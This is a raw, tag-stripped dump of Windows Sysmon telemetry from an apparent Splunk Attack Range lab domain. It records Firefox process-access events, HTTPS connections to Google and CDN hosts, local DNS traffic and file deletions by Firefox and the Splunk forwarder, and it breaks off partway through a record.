10341000x8000000000000000105957Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.481{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105956Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.481{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105955Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.481{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105954Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.480{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105953Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.480{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105952Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.682{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51812-false142.250.181.238fra16s56-in-f14.1e100.net443https 354300x8000000000000000105951Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.680{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51811-false142.250.184.226fra24s12-in-f2.1e100.net443https 354300x8000000000000000105950Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.494{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local64392-false142.250.185.65fra16s48-in-f1.1e100.net443https 354300x8000000000000000105949Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.465{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64391- 354300x8000000000000000105948Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.465{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62985- 354300x8000000000000000105947Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.465{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58636- 354300x8000000000000000105946Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.463{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51382- 354300x8000000000000000105945Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.462{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50849- 10341000x8000000000000000105944Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.418{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105943Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.399{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51810-false142.250.185.65fra16s48-in-f1.1e100.net443https 354300x8000000000000000105942Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.399{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51809-false151.101.112.193-443https 354300x8000000000000000105941Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.394{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51808-false192.0.73.2-443https 354300x8000000000000000105940Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.394{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51807-false192.0.73.2-443https 354300x8000000000000000105939Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.391{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50276- 354300x8000000000000000105938Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.389{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51806-false192.0.73.2-443https 354300x8000000000000000105937Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.388{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local57979- 354300x8000000000000000105936Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.387{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63035- 354300x8000000000000000105935Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.385{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local52716- 354300x8000000000000000105934Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.382{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63771- 354300x8000000000000000105933Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.377{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local57978-false142.250.185.234fra16s53-in-f10.1e100.net443https 354300x8000000000000000105932Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.340{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51805-false151.101.65.69-443https 354300x8000000000000000105931Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.339{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51803-false151.101.65.69-443https 354300x8000000000000000105930Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.339{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51804-false151.101.65.69-443https 354300x8000000000000000105929Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.339{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51802-false142.250.185.234fra16s53-in-f10.1e100.net443https 354300x8000000000000000105928Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.338{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49552- 354300x8000000000000000105927Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.338{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local65060- 354300x8000000000000000105926Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.335{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51304- 354300x8000000000000000105925Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.335{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62982- 10341000x8000000000000000105924Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.027{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105923Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.026{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105922Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.025{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105921Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.025{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105920Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.024{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105919Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.006{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 23542300x800000000000000082895Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:44.765{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F72A7305D378ABAFE6CAE34DB69C695E,SHA256=D0FE334473ECE6EA37F3383387E41CB6BE7DF026C7CBBBD04D0D47A2ABF62CE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106011Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.704{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local61998-false142.250.181.230fra16s56-in-f6.1e100.net443https 22542200x8000000000000000106010Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.521{58E9C193-B422-615A-0602-00000000FC01}5552s0-2mdn-net.l.google.com02a00:1450:4001:811::2006;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000106009Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.553{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=431A3BD7C945C37CA883F32CBA070B23,SHA256=1701D28BD1813C6449173EB19340A0550A06403FC8FA4BAF6E8D44482015B0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106008Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.539{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=4853F5CDD2F2318D94328CB963B79292,SHA256=75F288EAAE7D763E97F09361B11F4351A26EC6CC62E245DDAD1361EAE6679A55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106007Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.538{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=918F0A8735C9C24C2CE4C65DA0F24D1C,SHA256=874E9CCC5CA0FF48B8C40F3E13046E7AB04DA51A137BD567885735B7144560DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106006Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:44.537{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=FC814623E1C2811B10312FDC82A3F286,SHA256=6B226E2235E8218A44D51D2006EB552C83FE30E7078EB867F5C1C21AF0D03C64,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000106005Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.673{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51823-false142.250.181.230fra16s56-in-f6.1e100.net443https 354300x8000000000000000106004Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.641{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51822-false172.217.18.99zrh04s05-in-f99.1e100.net443https 354300x8000000000000000106003Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.641{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51821-false172.217.18.99zrh04s05-in-f99.1e100.net443https 354300x8000000000000000106002Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.565{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local61996-false142.250.185.130fra16s50-in-f2.1e100.net443https 354300x8000000000000000106001Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.547{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local61995-false142.250.185.161fra16s51-in-f1.1e100.net443https 354300x8000000000000000106000Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.516{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51820-false142.250.185.130fra16s50-in-f2.1e100.net443https 354300x8000000000000000105999Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.516{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51819-false142.250.185.130fra16s50-in-f2.1e100.net443https 354300x8000000000000000105998Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.515{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61994- 354300x8000000000000000105997Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.514{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64363- 354300x8000000000000000105996Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.514{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51818-false142.250.185.161fra16s51-in-f1.1e100.net443https 354300x8000000000000000105995Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.514{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51817-false142.250.185.161fra16s51-in-f1.1e100.net443https 354300x8000000000000000105994Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:43.513{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64710- 354300x8000000000000000105993Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 